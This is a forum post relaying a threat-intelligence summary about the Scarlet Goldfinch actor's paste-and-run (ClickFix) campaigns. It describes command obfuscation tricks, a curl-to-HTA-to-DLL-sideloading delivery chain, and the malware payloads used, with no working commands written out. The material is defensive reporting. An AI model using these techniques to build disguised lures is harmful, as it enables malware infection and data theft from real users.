(redcanary.com) Scarlet Goldfinch Threat Actor Evolves Paste-and-Run Techniques Across Multiple Attack Epochs
Uncategorized
1
Posts
1
Posters
0
Views
-
(redcanary.com) Scarlet Goldfinch Threat Actor Evolves Paste-and-Run Techniques Across Multiple Attack Epochs
Scarlet Goldfinch (SmartApeSG/ZPHP) evolves paste-and-run TTPs across 7 epochs, leveraging T1204.004 (Malicious Copy-Paste) for initial access. Recent campaigns use cmd.exe /v:on for delayed env var expansion, ^ escape obfuscation, and substring indexing. End-stage payloads remain NetSupport Manager (via Remcos), with StealC/ArechClient2 observed. DLL sideloading chain: curl-delivered HTA → AppData\Local staging → tar extraction → legitimate EXE abuse. Defenders: signature-based detection alone insufficient.
Source: https://redcanary.com/blog/threat-intelligence/scarlet-goldfinch-clickfix/
-
R relay@relay.infosec.exchange shared this topic
